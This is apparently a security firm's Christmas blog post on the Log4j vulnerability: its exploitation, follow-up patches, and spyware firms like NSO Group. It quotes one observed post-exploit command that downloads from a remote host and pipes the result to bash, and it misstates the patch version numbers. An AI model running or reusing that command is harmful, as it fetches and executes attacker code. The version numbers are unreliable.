Logging around the Christmas week
Unless you have been attending too many Christmas lunches, dinners, drinks parties (like our fantastic ‘Friends Of Tiberium’ new office opening event), you will have seen the news that yet another piece of open source code running on Unix servers has been discovered to contain a critical bug which ‘could be trivially abused by miscreants to hijack servers and apps over the internet’.
The code in question is the open source logging utility for Java, Log4j, which is a logging tool that allows you to log at runtime without modifying the application binary. The log4j package is designed so that logging statements can remain in shipped code without incurring a heavy performance cost. Logging behaviour can be controlled by editing a configuration file, without touching the application binary.
The matter was raised by our very own CEO, Drew Perry in a LinkedIn post week before last, who very correctly, given the number of internet facing servers which run the package, together with active attacks in the wild.
“This one could get bad. Please have a search for Log4J library in use within your environment and determine if any services are exposed to the internet (if so, it will be hit hard with exploit attempts) then apply the following mitigations.”
Since that time, there have been a huge number of attacks coming from all the usual suspects from organised crime through to bedroom script kiddies, for the usual crypto mining, ransomware and associated nefarious activities.
A specific Base64 encoded example spotted and decoded by Tiberium Cyber Defender George Thoma is post exploit activity from a Russia based server known to deploy crypto miners. They attempt to run the following command on exploited servers:
(curl -s 126.96.36.199:5874/188.8.131.52:80||wget -q -O- 184.108.40.206:5874/220.127.116.11:80)|bash
The initial Unix exploit has also been identified as a vector for the New Khonsari ransomware family which targets windows systems and appears to bypass anti virus.
The issue affects all versions of Log4j up to and including 2.14.1 and is obviously mitigated by identifying and patching affected servers. In many cases not an insignificant piece of work.
A handy consolidated list of vendor advisories can be found here.
Clearly many of you will have already completed this work (in time for a nice relaxing Christmas break!), however you should be aware of two follows on issues which are now doing the rounds, potentially requiring further patching. Obviously, when one (trivial to exploit) bug is found in a legacy package the gold rush for more begins.
The original patch (2.1.15) did not fix another bug resulting in another patch, yes 2.1.16, which in turn did not address yet another issue, so the latest and safest release of Log4j is now 2.1.17.
Clearly World+Dog are now poring over the Log4j code looking for loopholes, so expect more activity and be prepared to keep patching.
If you are a Tiberium MYTHIC customer you will notice in your Teams channels that we have been hunting for exploit attempts and identifying vulnerable devices in your environment remediation and applying remediation where possible alongside expert advice.
At Tiberium, we are always available for advice or to show you the power of our platform including automation of remediation. Please contact us if you wish.
We have always been worried about the pace of development which uses open source libraries and components, particularly in a containerised environment which may connect to legacy internal systems and directly to the Internet, even with virtual firewall and other filtering components in between. The potential for exploitation via bugs or misconfiguration must be a risk consideration for all businesses migrating to the new cloud first paradigm.
This ‘TheNewStack’ piece pretty much sums up our view of the open source conundrum which will surely outlive most of us!
A recent theme developing appears to be the use of legislation and straightforward ‘banning’ by the United States Government and US based firms to reduce the impact of espionage by (it would seem) non US based entities and associated tooling manufacturers such as The NSO Group.
This week, Facebook banned ‘’seven cyber mercenaries that it said carried out “indiscriminate” targeting of journalists, dissidents, critics of authoritarian regimes, families of opposition, and human rights activists located in over 100 countries, amid mounting scrutiny of surveillance technologies’.
Following this, the US Government have been pressured by Democratic Senators to ‘punish Israel-based spyware maker NSO Group and three other surveillance software firms for enabling human rights abuses’ and effectively put them out of business.
This is a murky old world however and nothing is straightforward. It can only be a matter of time that a new John Le Carré appears with a CyberSpy character, perhaps just with the 🙂 emoji or the tag 5m1l3y.
Now about the song.
There are many Yule Log Christmas songs and videos. The cheesiest we could find is by John Legend.
Have a very Merry Christmas. Best wishes to you and your families from all of us at Tiberium.
Tune in next time for our review of the year and some premonitions for the year to come. It can’t be as bad as this year. We hope.